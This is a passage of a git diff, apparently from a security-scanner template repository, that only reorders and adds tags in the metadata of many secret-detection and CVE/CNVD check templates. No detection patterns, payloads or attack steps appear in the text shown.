tags: file,keys,token file: - extensions: - all diff --git a/file/keys/easypost/easypost-api-token.yaml b/file/keys/easypost/easypost-api-token.yaml index 8d6455c987..e416beecac 100644 --- a/file/keys/easypost/easypost-api-token.yaml +++ b/file/keys/easypost/easypost-api-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-api-token.yaml metadata: verified: true - tags: easypost,file,token + tags: file,keys,easypost,token file: - extensions: diff --git a/file/keys/easypost/easypost-test-token.yaml b/file/keys/easypost/easypost-test-token.yaml index a0e724024a..8226b83f4e 100644 --- a/file/keys/easypost/easypost-test-token.yaml +++ b/file/keys/easypost/easypost-test-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/easypost-test-api-token.yaml metadata: verified: true - tags: easypost,file,token + tags: file,keys,easypost,token file: - extensions: diff --git a/file/keys/etsy-access-token.yaml b/file/keys/etsy-access-token.yaml index 1c30e875c0..335e2f8b73 100644 --- a/file/keys/etsy-access-token.yaml +++ b/file/keys/etsy-access-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/etsy-access-token.go metadata: verified: true - tags: etsy,file,token + tags: file,keys,etsy,token file: - extensions: - all diff --git a/file/keys/facebook/facebook-api-token.yaml b/file/keys/facebook/facebook-api-token.yaml index 3b6126349a..a4585d9a69 100644 --- a/file/keys/facebook/facebook-api-token.yaml +++ b/file/keys/facebook/facebook-api-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/facebook.go metadata: verified: true - tags: facebook,file,token + tags: keys,file,facebook,token file: - extensions: diff --git a/file/keys/facebook/facebook-client-id.yaml b/file/keys/facebook/facebook-client-id.yaml index 28a54a26a6..bd0e212839 100644 --- a/file/keys/facebook/facebook-client-id.yaml +++ b/file/keys/facebook/facebook-client-id.yaml @@ -9,7 +9,7 @@ info: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N cvss-score: 0 cwe-id: CWE-200 - tags: token,file,facebook + tags: keys,file,token,facebook file: - extensions: diff --git a/file/keys/facebook/facebook-secret.yaml b/file/keys/facebook/facebook-secret.yaml index 3f52e44e9e..2459bac18d 100644 --- a/file/keys/facebook/facebook-secret.yaml +++ b/file/keys/facebook/facebook-secret.yaml @@ -5,7 +5,7 @@ info: author: gaurang severity: low description: Facebook secret key token was detected. - tags: token,file,facebook + tags: keys,file,token,facebook file: - extensions: diff --git a/file/keys/facebook/fb-access-token.yaml b/file/keys/facebook/fb-access-token.yaml index b0442b9272..5032cc5091 100644 --- a/file/keys/facebook/fb-access-token.yaml +++ b/file/keys/facebook/fb-access-token.yaml @@ -9,7 +9,7 @@ info: - https://developers.facebook.com/docs/facebook-login/access-tokens/ metadata: verified: true - tags: facebook,token,file + tags: file,keys,facebook,token file: - extensions: diff --git a/file/keys/fastly-api-token.yaml b/file/keys/fastly-api-token.yaml index 02ee17c702..fc84ed63d6 100644 --- a/file/keys/fastly-api-token.yaml +++ b/file/keys/fastly-api-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/fastly-api-token.go metadata: verified: true - tags: fastly,file,token + tags: keys,file,fastly,token file: - extensions: - all diff --git a/file/keys/fcm-api-key.yaml b/file/keys/fcm-api-key.yaml index 9e4321c76a..5b522f2293 100644 --- a/file/keys/fcm-api-key.yaml +++ b/file/keys/fcm-api-key.yaml @@ -4,7 +4,7 @@ info: name: Firebase Cloud Messaging Token author: Devang-Solanki severity: medium - tags: token,file,fcm,firebase,google + tags: file,keys,token,fcm,firebase,google file: - extensions: - all diff --git a/file/keys/figma-access-token.yaml b/file/keys/figma-access-token.yaml index b6c25b5ea0..0ac82e862c 100644 --- a/file/keys/figma-access-token.yaml +++ b/file/keys/figma-access-token.yaml @@ -9,7 +9,7 @@ info: - https://www.figma.com/developers/api metadata: verified: true - tags: figma,file,token + tags: file,keys,figma,token file: - extensions: - all diff --git a/file/keys/finicity/finicity-api-token.yaml b/file/keys/finicity/finicity-api-token.yaml index 340f473fc0..ac60918741 100644 --- a/file/keys/finicity/finicity-api-token.yaml +++ b/file/keys/finicity/finicity-api-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-api-token.go metadata: verified: true - tags: finicity,file,token + tags: file,keys,finicity,token file: - extensions: - all diff --git a/file/keys/finicity/finicity-client-secret.yaml b/file/keys/finicity/finicity-client-secret.yaml index db35247705..2708f526fc 100644 --- a/file/keys/finicity/finicity-client-secret.yaml +++ b/file/keys/finicity/finicity-client-secret.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finicity-client-secret.go metadata: verified: true - tags: finicity,file,token + tags: file,keys,finicity,token file: - extensions: - all diff --git a/file/keys/finnhub-access-token.yaml b/file/keys/finnhub-access-token.yaml index e6e22a65fa..b79dfaaa00 100644 --- a/file/keys/finnhub-access-token.yaml +++ b/file/keys/finnhub-access-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/returntocorp/semgrep-rules/blob/develop/generic/secrets/gitleaks/finnhub-access-token.go metadata: verified: true - tags: finnhub,file,token + tags: file,keys,finnhub,token file: - extensions: - all diff --git a/file/keys/firebase-database.yaml b/file/keys/firebase-database.yaml index 5add03dc6c..2490779adf 100644 --- a/file/keys/firebase-database.yaml +++ b/file/keys/firebase-database.yaml @@ -4,7 +4,7 @@ info: name: Firebase Database Detect author: gaurang severity: info - tags: token,file,firebase + tags: file,keys,token,firebase file: - extensions: - all diff --git a/file/keys/gcp-service-account.yaml b/file/keys/gcp-service-account.yaml index bbf46ef2a0..8a77470417 100644 --- a/file/keys/gcp-service-account.yaml +++ b/file/keys/gcp-service-account.yaml @@ -4,7 +4,7 @@ info: name: Google (GCP) Service-account author: gaurang severity: low - tags: token,file,google + tags: file,keys,token,google file: - extensions: - all diff --git a/file/keys/github/github-app-token.yaml b/file/keys/github/github-app-token.yaml index e4e0e08028..86d65e1e5b 100644 --- a/file/keys/github/github-app-token.yaml +++ b/file/keys/github/github-app-token.yaml @@ -4,7 +4,7 @@ info: name: Github App Token author: tanq16,DhiyaneshDK severity: medium - tags: token,file,github + tags: keys,file,token,github file: - extensions: - all diff --git a/file/keys/github/github-oauth-token.yaml b/file/keys/github/github-oauth-token.yaml index a72ffb90f3..07eddaa0db 100644 --- a/file/keys/github/github-oauth-token.yaml +++ b/file/keys/github/github-oauth-token.yaml @@ -4,7 +4,7 @@ info: name: Github OAuth Access Token author: tanq16 severity: high - tags: token,file,github + tags: file,keys,token,github file: - extensions: - all diff --git a/file/keys/github/github-outdated-key.yaml b/file/keys/github/github-outdated-key.yaml index 105e18d691..e2d97a10b2 100644 --- a/file/keys/github/github-outdated-key.yaml +++ b/file/keys/github/github-outdated-key.yaml @@ -11,7 +11,7 @@ info: - https://web.archive.org/web/20230316194229/https://docs.github.com/en/enterprise-cloud@latest/authentication/keeping-your-account-and-data-secure/githubs-ssh-key-fingerprints metadata: verified: true - tags: file,github,ssh,rsa + tags: file,keys,github,ssh,rsa file: - extensions: - all diff --git a/file/keys/github/github-personal-token.yaml b/file/keys/github/github-personal-token.yaml index 869cf6356d..1974242eac 100644 --- a/file/keys/github/github-personal-token.yaml +++ b/file/keys/github/github-personal-token.yaml @@ -4,7 +4,7 @@ info: name: Github Personal Token author: geeknik severity: high - tags: token,file,github + tags: file,keys,token,github file: - extensions: - all diff --git a/file/keys/github/github-refresh-token.yaml b/file/keys/github/github-refresh-token.yaml index ce7e551099..718e852c33 100644 --- a/file/keys/github/github-refresh-token.yaml +++ b/file/keys/github/github-refresh-token.yaml @@ -4,7 +4,7 @@ info: name: Github Refresh Token author: tanq16 severity: high - tags: token,file,github + tags: file,keys,token,github file: - extensions: - all diff --git a/file/keys/gitlab/gitlab-personal-accesstoken.yaml b/file/keys/gitlab/gitlab-personal-accesstoken.yaml index 4c9995d9b3..6a29479bb7 100644 --- a/file/keys/gitlab/gitlab-personal-accesstoken.yaml +++ b/file/keys/gitlab/gitlab-personal-accesstoken.yaml @@ -9,7 +9,7 @@ info: - https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html metadata: verified: true - tags: gitlab,token,file + tags: file,keys,gitlab,token file: - extensions: - all diff --git a/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml b/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml index 92ee6b04ae..d8c0570f8d 100644 --- a/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml +++ b/file/keys/gitlab/gitlab-pipeline-triggertoken.yaml @@ -11,7 +11,7 @@ info: - https://gitlab.com/gitlab-org/gitlab/-/issues/388379 metadata: verified: true - tags: gitlab,token,file + tags: keys,file,gitlab,token file: - extensions: - all diff --git a/file/keys/gitlab/gitlab-runner-regtoken.yaml b/file/keys/gitlab/gitlab-runner-regtoken.yaml index b4aaa953a8..6731a26a66 100644 --- a/file/keys/gitlab/gitlab-runner-regtoken.yaml +++ b/file/keys/gitlab/gitlab-runner-regtoken.yaml @@ -11,7 +11,7 @@ info: - https://docs.gitlab.com/ee/security/token_overview.html#security-considerations metadata: verified: true - tags: gitlab,runner,token,file + tags: keys,file,gitlab,runner,token file: - extensions: - all diff --git a/file/keys/google/google-api.yaml b/file/keys/google/google-api.yaml index a9ecc5e465..10f4cfbc76 100644 --- a/file/keys/google/google-api.yaml +++ b/file/keys/google/google-api.yaml @@ -4,7 +4,7 @@ info: name: Google API key author: gaurang severity: info - tags: token,file,google + tags: keys,file,token,google file: - extensions: - all diff --git a/file/keys/google/google-clientid.yaml b/file/keys/google/google-clientid.yaml index 3f18e6ac6f..25d3fbad36 100644 --- a/file/keys/google/google-clientid.yaml +++ b/file/keys/google/google-clientid.yaml @@ -8,7 +8,7 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/google.yml metadata: verified: true - tags: google,token,file + tags: file,keys,google,token file: - extensions: - all diff --git a/file/keys/google/google-oauth-clientsecret.yaml b/file/keys/google/google-oauth-clientsecret.yaml index c04ee93606..42297c45d4 100644 --- a/file/keys/google/google-oauth-clientsecret.yaml +++ b/file/keys/google/google-oauth-clientsecret.yaml @@ -8,7 +8,7 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/google.yml metadata: verified: true - tags: google,token,file + tags: file,keys,google,token file: - extensions: - all diff --git a/file/keys/heroku-key.yaml b/file/keys/heroku-key.yaml index 536535734e..b93a7cec54 100644 --- a/file/keys/heroku-key.yaml +++ b/file/keys/heroku-key.yaml @@ -9,7 +9,7 @@ info: - https://devcenter.heroku.com/articles/authentication metadata: verified: true - tags: heroku,token,file + tags: file,keys,heroku,token file: - extensions: - all diff --git a/file/keys/jenkins-token.yaml b/file/keys/jenkins-token.yaml index a7c5e78fd6..c4346b4a56 100644 --- a/file/keys/jenkins-token.yaml +++ b/file/keys/jenkins-token.yaml @@ -10,7 +10,7 @@ info: - https://www.jenkins.io/doc/book/security/csrf-protection/ metadata: verified: true - tags: jenkins,crumb,token,file + tags: file,keys,jenkins,crumb,token file: - extensions: - all diff --git a/file/keys/linkedin-id.yaml b/file/keys/linkedin-id.yaml index 5f071d9886..fd03ba9937 100644 --- a/file/keys/linkedin-id.yaml +++ b/file/keys/linkedin-id.yaml @@ -4,7 +4,7 @@ info: name: Linkedin Client ID author: gaurang severity: low - tags: token,file,linkedin + tags: file,keys,token,linkedin file: - extensions: - all diff --git a/file/keys/mailchimp-api.yaml b/file/keys/mailchimp-api.yaml index 09657f0502..26afea94f5 100644 --- a/file/keys/mailchimp-api.yaml +++ b/file/keys/mailchimp-api.yaml @@ -4,7 +4,7 @@ info: name: Mailchimp API Key author: gaurang severity: high - tags: token,file,mailchimp + tags: keys,file,token,mailchimp file: - extensions: - all diff --git a/file/keys/mailgun-api.yaml b/file/keys/mailgun-api.yaml index 0c3db4d856..a38ccd49bf 100644 --- a/file/keys/mailgun-api.yaml +++ b/file/keys/mailgun-api.yaml @@ -4,7 +4,7 @@ info: name: Mailgun API Key author: gaurang severity: high - tags: token,file,mailgun + tags: file,keys,token,mailgun file: - extensions: - all diff --git a/file/keys/mapbox-token.yaml b/file/keys/mapbox-token.yaml index dd5c6d2670..a7b2ed7ea9 100644 --- a/file/keys/mapbox-token.yaml +++ b/file/keys/mapbox-token.yaml @@ -9,7 +9,7 @@ info: - https://github.com/zricethezav/gitleaks/blob/master/cmd/generate/config/rules/mapbox.go metadata: verified: true - tags: token,file,mapbox + tags: file,keys,token,mapbox file: - extensions: - all diff --git a/file/keys/newrelic/newrelic-pixie-apikey.yaml b/file/keys/newrelic/newrelic-pixie-apikey.yaml index d6b0a88f2e..eac36ad7ef 100644 --- a/file/keys/newrelic/newrelic-pixie-apikey.yaml +++ b/file/keys/newrelic/newrelic-pixie-apikey.yaml @@ -9,7 +9,7 @@ info: - https://docs.px.dev/reference/admin/api-keys/ metadata: verified: true - tags: newrelic,pixie,token,file + tags: file,keys,newrelic,pixie,token file: - extensions: - all diff --git a/file/keys/newrelic/newrelic-pixie-deploykey.yaml b/file/keys/newrelic/newrelic-pixie-deploykey.yaml index efa75eb263..1f6dc6a74f 100644 --- a/file/keys/newrelic/newrelic-pixie-deploykey.yaml +++ b/file/keys/newrelic/newrelic-pixie-deploykey.yaml @@ -9,7 +9,7 @@ info: - https://docs.px.dev/reference/admin/api-keys/ metadata: verified: true - tags: newrelic,pixie,token,file + tags: file,keys,newrelic,pixie,token file: - extensions: - all diff --git a/file/keys/npm-accesstoken.yaml b/file/keys/npm-accesstoken.yaml index 25acd53f1f..d37b0e379a 100644 --- a/file/keys/npm-accesstoken.yaml +++ b/file/keys/npm-accesstoken.yaml @@ -11,7 +11,7 @@ info: - https://github.blog/changelog/2022-12-06-limit-scope-of-npm-tokens-with-the-new-granular-access-tokens/ metadata: verified: true - tags: npm,token,file + tags: keys,file,npm,token file: - extensions: - all diff --git a/file/keys/nuget-key.yaml b/file/keys/nuget-key.yaml index d2d62934a5..eb5a498c62 100644 --- a/file/keys/nuget-key.yaml +++ b/file/keys/nuget-key.yaml @@ -9,7 +9,7 @@ info: - https://docs.microsoft.com/en-us/nuget/nuget-org/publish-a-package#create-api-keys metadata: verified: true - tags: nuget,token,file + tags: keys,file,nuget,token file: - extensions: - all diff --git a/file/keys/openai-key.yaml b/file/keys/openai-key.yaml index cbf3694c31..9ec1ac9b27 100644 --- a/file/keys/openai-key.yaml +++ b/file/keys/openai-key.yaml @@ -10,7 +10,7 @@ info: - https://platform.openai.com/docs/api-reference/authentication metadata: verified: true - tags: openai,token,file + tags: file,keys,openai,token file: - extensions: - all diff --git a/file/keys/paypal-braintree-token.yaml b/file/keys/paypal-braintree-token.yaml index 7b6e80e01e..e3f63933ef 100644 --- a/file/keys/paypal-braintree-token.yaml +++ b/file/keys/paypal-braintree-token.yaml @@ -4,7 +4,7 @@ info: name: Paypal Braintree Access Token author: gaurang severity: high - tags: token,file,paypal + tags: file,keys,token,paypal file: - extensions: - all diff --git a/file/keys/pictatic-api-key.yaml b/file/keys/pictatic-api-key.yaml index 41ea01a136..4efcaf3a8c 100644 --- a/file/keys/pictatic-api-key.yaml +++ b/file/keys/pictatic-api-key.yaml @@ -4,7 +4,7 @@ info: name: Pictatic API Key author: gaurang severity: high - tags: token,file + tags: keys,file,token file: - extensions: - all diff --git a/file/keys/private-key.yaml b/file/keys/private-key.yaml index bc2ce2bb9d..c5febddcd7 100644 --- a/file/keys/private-key.yaml +++ b/file/keys/private-key.yaml @@ -4,7 +4,7 @@ info: name: Private Key Detect author: gaurang,geeknik severity: high - tags: token,file + tags: file,keys,token file: - extensions: - all diff --git a/file/keys/pypi-token.yaml b/file/keys/pypi-token.yaml index cdc3ef1dbe..f578c503b4 100644 --- a/file/keys/pypi-token.yaml +++ b/file/keys/pypi-token.yaml @@ -10,7 +10,7 @@ info: - https://pypi.org/project/pypitoken/ metadata: verified: true - tags: pypi,token,file + tags: file,keys,pypi,token file: - extensions: - all diff --git a/file/keys/razorpay-client-id.yaml b/file/keys/razorpay-client-id.yaml index 3c3165359b..f08ef2e761 100644 --- a/file/keys/razorpay-client-id.yaml +++ b/file/keys/razorpay-client-id.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/streaak/keyhacks#Razorpay-keys - https://docs.gitguardian.com/secrets-detection/detectors/specifics/razorpay_apikey - tags: token,file,razorpay + tags: file,keys,token,razorpay file: - extensions: - all diff --git a/file/keys/rubygems-key.yaml b/file/keys/rubygems-key.yaml index 6fd748c2ef..512cbed45a 100644 --- a/file/keys/rubygems-key.yaml +++ b/file/keys/rubygems-key.yaml @@ -10,7 +10,7 @@ info: - https://guides.rubygems.org/api-key-scopes/ metadata: verified: true - tags: rubygems,token,file,ruby + tags: file,keys,rubygems,token,ruby file: - extensions: - all diff --git a/file/keys/s3-bucket.yaml b/file/keys/s3-bucket.yaml index d542011f1c..3c4b9bb6fa 100644 --- a/file/keys/s3-bucket.yaml +++ b/file/keys/s3-bucket.yaml @@ -4,7 +4,7 @@ info: name: S3 Bucket Detect author: gaurang severity: info - tags: token,file,bucket + tags: file,keys,token,bucket file: - extensions: - all diff --git a/file/keys/sauce-access-token.yaml b/file/keys/sauce-access-token.yaml index 2a2e59de29..76a8e88cd0 100644 --- a/file/keys/sauce-access-token.yaml +++ b/file/keys/sauce-access-token.yaml @@ -8,7 +8,7 @@ info: - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/sauce.yml metadata: verified: true - tags: sauce,token,file + tags: file,keys,sauce,token file: - extensions: - all diff --git a/file/keys/segment-public-api.yaml b/file/keys/segment-public-api.yaml index 3bb96aeace..5af0340aae 100644 --- a/file/keys/segment-public-api.yaml +++ b/file/keys/segment-public-api.yaml @@ -10,7 +10,7 @@ info: - https://segment.com/blog/how-segment-proactively-protects-customer-api-tokens/ metadata: verified: true - tags: segment,token,file + tags: keys,file,segment,token file: - extensions: - all diff --git a/file/keys/sendgrid-api.yaml b/file/keys/sendgrid-api.yaml index f8d5d81271..0166cbcd46 100644 --- a/file/keys/sendgrid-api.yaml +++ b/file/keys/sendgrid-api.yaml @@ -4,7 +4,7 @@ info: name: Sendgrid API Key author: gaurang severity: high - tags: token,file,sendgrid + tags: keys,file,token,sendgrid file: - extensions: - all diff --git a/file/keys/shopify-custom-token.yaml b/file/keys/shopify-custom-token.yaml index 633272cb11..b4f6f5ea21 100644 --- a/file/keys/shopify-custom-token.yaml +++ b/file/keys/shopify-custom-token.yaml @@ -4,7 +4,7 @@ info: name: Shopify Custom App Access Token author: gaurang severity: high - tags: token,file + tags: file,keys,token file: - extensions: - all diff --git a/file/keys/shopify-private-token.yaml b/file/keys/shopify-private-token.yaml index bd7661b886..22235d6c3f 100644 --- a/file/keys/shopify-private-token.yaml +++ b/file/keys/shopify-private-token.yaml @@ -4,7 +4,7 @@ info: name: Shopify Private App Access Token author: gaurang severity: high - tags: token,file + tags: file,keys,token file: - extensions: - all diff --git a/file/keys/shopify-public-access.yaml b/file/keys/shopify-public-access.yaml index 8f1fd3c6a0..2526614ddf 100644 --- a/file/keys/shopify-public-access.yaml +++ b/file/keys/shopify-public-access.yaml @@ -10,7 +10,7 @@ info: - https://shopify.dev/changelog/app-secret-key-length-has-increased metadata: verified: true - tags: shopify,token,file + tags: file,keys,shopify,token file: - extensions: - all diff --git a/file/keys/shopify-shared-secret.yaml b/file/keys/shopify-shared-secret.yaml index 5385f63e94..64bf68a6e3 100644 --- a/file/keys/shopify-shared-secret.yaml +++ b/file/keys/shopify-shared-secret.yaml @@ -4,7 +4,7 @@ info: name: Shopify Shared Secret author: gaurang severity: high - tags: token,file + tags: file,keys,token file: - extensions: - all diff --git a/file/keys/shopify-token.yaml b/file/keys/shopify-token.yaml index 2ca1c829f5..5dd2255b16 100644 --- a/file/keys/shopify-token.yaml +++ b/file/keys/shopify-token.yaml @@ -4,7 +4,7 @@ info: name: Shopify Access Token author: gaurang severity: high - tags: token,file + tags: file,keys,token file: - extensions: - all diff --git a/file/keys/slack-api.yaml b/file/keys/slack-api.yaml index 6f17ee55d5..99277133e0 100644 --- a/file/keys/slack-api.yaml +++ b/file/keys/slack-api.yaml @@ -4,7 +4,7 @@ info: name: Slack API Key author: gaurang severity: high - tags: token,file,slack + tags: file,keys,token,slack file: - extensions: - all diff --git a/file/keys/slack-webhook.yaml b/file/keys/slack-webhook.yaml index c44af0fefa..6cc369ad33 100644 --- a/file/keys/slack-webhook.yaml +++ b/file/keys/slack-webhook.yaml @@ -4,7 +4,7 @@ info: name: Slack Webhook author: gaurang severity: high - tags: token,file,slack + tags: file,keys,token,slack file: - extensions: - all diff --git a/file/keys/square-access-token.yaml b/file/keys/square-access-token.yaml index 185bedae17..3ade556da4 100644 --- a/file/keys/square-access-token.yaml +++ b/file/keys/square-access-token.yaml @@ -4,7 +4,7 @@ info: name: Square Access Token author: gaurang,daffainfo severity: high - tags: token,file,square + tags: file,keys,token,square file: - extensions: - all diff --git a/file/keys/square-oauth-secret.yaml b/file/keys/square-oauth-secret.yaml index bc2af245f7..c49516759a 100644 --- a/file/keys/square-oauth-secret.yaml +++ b/file/keys/square-oauth-secret.yaml @@ -4,7 +4,7 @@ info: name: Square OAuth Secret author: gaurang severity: high - tags: token,file,square + tags: file,keys,token,square file: - extensions: - all diff --git a/file/keys/stackhawk-api-key.yaml b/file/keys/stackhawk-api-key.yaml index 0f1688cec2..5f15720bd5 100644 --- a/file/keys/stackhawk-api-key.yaml +++ b/file/keys/stackhawk-api-key.yaml @@ -8,7 +8,7 @@ info: - https://docs.stackhawk.com/apidocs.html metadata: verified: true - tags: token,file + tags: file,keys,token file: - extensions: - all diff --git a/file/keys/stripe-api-key.yaml b/file/keys/stripe-api-key.yaml index a5ea66caf7..42d18a504d 100644 --- a/file/keys/stripe-api-key.yaml +++ b/file/keys/stripe-api-key.yaml @@ -4,7 +4,7 @@ info: name: Stripe API Key author: gaurang severity: high - tags: token,file,stripe + tags: file,keys,token,stripe file: - extensions: - all diff --git a/file/keys/telegram-token.yaml b/file/keys/telegram-token.yaml index 9ab9575668..c556a71701 100644 --- a/file/keys/telegram-token.yaml +++ b/file/keys/telegram-token.yaml @@ -10,7 +10,7 @@ info: - https://core.telegram.org/bots/features#botfather metadata: verified: true - tags: telegram,token,file + tags: file,keys,telegram,token file: - extensions: - all diff --git a/file/keys/twilio-api.yaml b/file/keys/twilio-api.yaml index 94674dffe2..46a2dab12c 100644 --- a/file/keys/twilio-api.yaml +++ b/file/keys/twilio-api.yaml @@ -4,7 +4,7 @@ info: name: Twilio API Key author: gaurang severity: high - tags: token,file + tags: file,keys,token file: - extensions: - all diff --git a/file/keys/twitter-secret.yaml b/file/keys/twitter-secret.yaml index 0a89da00fa..56176aac1d 100644 --- a/file/keys/twitter-secret.yaml +++ b/file/keys/twitter-secret.yaml @@ -4,7 +4,7 @@ info: name: Twitter Secret author: gaurang,daffainfo severity: medium - tags: token,file,twitter + tags: file,keys,token,twitter file: - extensions: - all diff --git a/file/keys/zapier-webhook.yaml b/file/keys/zapier-webhook.yaml index 137e5dbe48..c5af462a53 100644 --- a/file/keys/zapier-webhook.yaml +++ b/file/keys/zapier-webhook.yaml @@ -7,7 +7,7 @@ info: reference: - https://github.com/streaak/keyhacks#Zapier-Webhook-Token - https://docs.gitguardian.com/secrets-detection/detectors/specifics/zapier_webhook_url - tags: token,file,zapier + tags: file,keys,token,zapier file: - extensions: - all diff --git a/file/url-analyse/url-extension-inspector.yaml b/file/url-analyse/url-extension-inspector.yaml index b433d1ce1b..2486f858f2 100644 --- a/file/url-analyse/url-extension-inspector.yaml +++ b/file/url-analyse/url-extension-inspector.yaml @@ -8,7 +8,7 @@ info: This template assists you in discovering intriguing extensions within a list of URLs. reference: - https://github.com/CYS4srl/CYS4-SensitiveDiscoverer/ - tags: file,urls,extension + tags: file,url-analyse,urls,extension file: - extensions: - all diff --git a/headless/cves/2018/CVE-2018-25031.yaml b/headless/cves/2018/CVE-2018-25031.yaml index 48cf8c8b71..d00d78575e 100644 --- a/headless/cves/2018/CVE-2018-25031.yaml +++ b/headless/cves/2018/CVE-2018-25031.yaml @@ -29,7 +29,7 @@ info: product: swagger_ui shodan-query: http.component:"Swagger" fofa-query: icon_hash="-1180440057" - tags: cve,cve2018,headless,swagger,xss + tags: headless,cve,cve2018,swagger,xss,smartbear headless: - steps: diff --git a/http/cnvd/2018/CNVD-2018-13393.yaml b/http/cnvd/2018/CNVD-2018-13393.yaml index dd442a9889..48aca84bfa 100644 --- a/http/cnvd/2018/CNVD-2018-13393.yaml +++ b/http/cnvd/2018/CNVD-2018-13393.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-22 metadata: max-request: 1 - tags: metinfo,cnvd,cvnd2018,lfi + tags: cnvd2018,cnvd,metinfo,cvnd2018,lfi http: - method: GET diff --git a/http/cnvd/2019/CNVD-2019-01348.yaml b/http/cnvd/2019/CNVD-2019-01348.yaml index 725da0f9e4..c7524e3cac 100644 --- a/http/cnvd/2019/CNVD-2019-01348.yaml +++ b/http/cnvd/2019/CNVD-2019-01348.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-284 metadata: max-request: 1 - tags: xiuno,cnvd,cnvd2019 + tags: cnvd2019,cnvd,xiuno http: - method: GET diff --git a/http/cnvd/2019/CNVD-2019-06255.yaml b/http/cnvd/2019/CNVD-2019-06255.yaml index 206ca7150a..9c47cec765 100644 --- a/http/cnvd/2019/CNVD-2019-06255.yaml +++ b/http/cnvd/2019/CNVD-2019-06255.yaml @@ -15,7 +15,7 @@ info: cwe-id: CWE-77 metadata: max-request: 1 - tags: rce,cnvd,catfishcms,cnvd2019 + tags: cnvd,cnvd2019,rce,catfishcms http: - method: GET diff --git a/http/cnvd/2019/CNVD-2019-19299.yaml b/http/cnvd/2019/CNVD-2019-19299.yaml index 93023ed805..7cc414bd11 100644 --- a/http/cnvd/2019/CNVD-2019-19299.yaml +++ b/http/cnvd/2019/CNVD-2019-19299.yaml @@ -14,7 +14,7 @@ info: cwe-id: CWE-77 metadata: max-request: 2 - tags: zhiyuan,cnvd,cnvd2019,rce,intrusive + tags: cnvd2019,cnvd,zhiyuan,rce,intrusive http: - raw: diff --git a/http/cnvd/2019/CNVD-2019-32204.yaml b/http/cnvd/2019/CNVD-2019-32204.yaml index 6d38dac2e0..86e936121d 100644 --- a/http/cnvd/2019/CNVD-2019-32204.yaml +++ b/http/cnvd/2019/CNVD-2019-32204.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-77 metadata: max-request: 1 - tags: fanwei,cnvd,cnvd2019,rce + tags: cnvd,cnvd2019,fanwei,rce http: - raw: diff --git a/http/cnvd/2020/CNVD-2020-23735.yaml b/http/cnvd/2020/CNVD-2020-23735.yaml index f4faaa0ca9..02f5e6750d 100644 --- a/http/cnvd/2020/CNVD-2020-23735.yaml +++ b/http/cnvd/2020/CNVD-2020-23735.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-22 metadata: max-request: 1 - tags: xunchi,lfi,cnvd,cnvd2020 + tags: cnvd,cnvd2020,xunchi,lfi http: - method: GET diff --git a/http/cnvd/2020/CNVD-2020-56167.yaml b/http/cnvd/2020/CNVD-2020-56167.yaml index 24c8d479d3..73d8cd34c1 100644 --- a/http/cnvd/2020/CNVD-2020-56167.yaml +++ b/http/cnvd/2020/CNVD-2020-56167.yaml @@ -10,7 +10,7 @@ info: - https://securityforeveryone.com/tools/ruijie-smartweb-default-password-scanner metadata: max-request: 1 - tags: ruijie,default-login,cnvd,cnvd2020 + tags: cnvd,cnvd2020,ruijie,default-login http: - method: POST diff --git a/http/cnvd/2020/CNVD-2020-62422.yaml b/http/cnvd/2020/CNVD-2020-62422.yaml index 6493d90249..9ec8060004 100644 --- a/http/cnvd/2020/CNVD-2020-62422.yaml +++ b/http/cnvd/2020/CNVD-2020-62422.yaml @@ -9,7 +9,7 @@ info: - https://blog.csdn.net/m0_46257936/article/details/113150699 metadata: max-request: 1 - tags: lfi,cnvd,cnvd2020,seeyon + tags: cnvd,cnvd2020,lfi,seeyon http: - method: GET diff --git a/http/cnvd/2020/CNVD-2020-63964.yaml b/http/cnvd/2020/CNVD-2020-63964.yaml index 7ca0aa2ddb..6375f4e6ca 100644 --- a/http/cnvd/2020/CNVD-2020-63964.yaml +++ b/http/cnvd/2020/CNVD-2020-63964.yaml @@ -12,7 +12,7 @@ info: max-request: 1 shodan-query: http.favicon.hash:-1298131932 fofa-query: jshERP-boot - tags: cnvd,cnvd2022,jsherp,disclosure + tags: cnvd,cnvd2020,jsherp,disclosure http: - method: GET diff --git a/http/cnvd/2020/CNVD-2020-68596.yaml b/http/cnvd/2020/CNVD-2020-68596.yaml index 4f44d8c2ed..220e3c38de 100644 --- a/http/cnvd/2020/CNVD-2020-68596.yaml +++ b/http/cnvd/2020/CNVD-2020-68596.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-22 metadata: max-request: 3 - tags: weiphp,lfi,cnvd,cnvd2020 + tags: cnvd,cnvd2020,weiphp,lfi http: - raw: diff --git a/http/cnvd/2021/CNVD-2021-01931.yaml b/http/cnvd/2021/CNVD-2021-01931.yaml index 5f5c67e5af..7e97d32f91 100644 --- a/http/cnvd/2021/CNVD-2021-01931.yaml +++ b/http/cnvd/2021/CNVD-2021-01931.yaml @@ -13,7 +13,7 @@ info: cwe-id: CWE-22 metadata: max-request: 2 - tags: ruoyi,lfi,cnvd,cnvd2021 + tags: 